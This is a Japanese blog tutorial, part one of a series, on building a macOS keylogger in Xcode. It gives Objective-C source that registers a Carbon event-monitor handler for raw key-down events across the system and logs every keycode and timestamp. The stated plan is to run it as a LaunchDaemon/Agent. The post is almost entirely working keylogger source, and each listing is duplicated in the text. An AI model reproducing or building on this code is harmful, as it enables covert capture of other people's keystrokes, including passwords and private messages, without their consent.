Xcodeでキーロガーを作ろう (1)
2012.01.18
env
- OS X 10.6.8
- Xcode 4.0.2
キーロガーの概要
- Carbon Event Manager を使う
- ユーザ空間で動くようにする => カーネルプログラミングなし
- あわよくばデーモン化する => LaunchDaemon/Agent
Carbon Event Manager での簡単な実装
- need Carbon.framework
list 1-1 (keyloggerAppDelegate.h):
#import <Cocoa/Cocoa.h>
#import <Carbon/Carbon.h>
@interface keyloggerAppDelegate : NSObject <NSApplicationDelegate> {
@private
NSWindow *window;
}
@property (assign) IBOutlet NSWindow *window;
@end
#import <Carbon/Carbon.h>
@interface keyloggerAppDelegate : NSObject <NSApplicationDelegate> {
@private
NSWindow *window;
}
@property (assign) IBOutlet NSWindow *window;
@end
list 1-2 (keyloggerAppDelegate.m):
#import "keyloggerAppDelegate.h"
@implementation keyloggerAppDelegate
@synthesize window;
OSStatus MyEventHandlerProc ( EventHandlerCallRef inHandlerCallRef,EventRef inEvent,void * inUserData)
{
OSStatus result = eventNotHandledErr;
// EventRecord what for ?
/*
EventRecord* rec;
ConvertEventRefToEventRecord(inEvent, &rec);
//NSLog(@"%s", rec.what);
//printf("%i", rec->what);
*/
// get event time on ocurred.
EventTime t;
t = GetEventTime(inEvent);
NSLog(@"event time: %d", t);
// get keyboard event parameters.
UInt32 outData;
OSStatus ret = GetEventParameter(inEvent, kEventParamKeyCode, typeUInt32, NULL, sizeof(outData), NULL, &outData);
NSLog(@"%i", ret);
if(ret == noErr){
NSLog(@"keyCode: %i", outData);
}
else{
NSLog(@"error occurred");
}
return result;
}
- (void)applicationDidFinishLaunching:(NSNotification *)aNotification
{
EventTargetRef target = GetEventMonitorTarget();
EventTypeSpec eventTypes[1];
eventTypes[0].eventClass = kEventClassKeyboard;
eventTypes[0].eventKind = kEventRawKeyDown;
InstallEventHandler(
target,
&MyEventHandlerProc,
1,
eventTypes,
NULL,
NULL
);
}
- (void)applicationWillTerminate:(NSNotification *)aNotification{
NSLog(@"applicationWillTerminate");
}
@end
@implementation keyloggerAppDelegate
@synthesize window;
OSStatus MyEventHandlerProc ( EventHandlerCallRef inHandlerCallRef,EventRef inEvent,void * inUserData)
{
OSStatus result = eventNotHandledErr;
// EventRecord what for ?
/*
EventRecord* rec;
ConvertEventRefToEventRecord(inEvent, &rec);
//NSLog(@"%s", rec.what);
//printf("%i", rec->what);
*/
// get event time on ocurred.
EventTime t;
t = GetEventTime(inEvent);
NSLog(@"event time: %d", t);
// get keyboard event parameters.
UInt32 outData;
OSStatus ret = GetEventParameter(inEvent, kEventParamKeyCode, typeUInt32, NULL, sizeof(outData), NULL, &outData);
NSLog(@"%i", ret);
if(ret == noErr){
NSLog(@"keyCode: %i", outData);
}
else{
NSLog(@"error occurred");
}
return result;
}
- (void)applicationDidFinishLaunching:(NSNotification *)aNotification
{
EventTargetRef target = GetEventMonitorTarget();
EventTypeSpec eventTypes[1];
eventTypes[0].eventClass = kEventClassKeyboard;
eventTypes[0].eventKind = kEventRawKeyDown;
InstallEventHandler(
target,
&MyEventHandlerProc,
1,
eventTypes,
NULL,
NULL
);
}
- (void)applicationWillTerminate:(NSNotification *)aNotification{
NSLog(@"applicationWillTerminate");
}
@end
途中経過
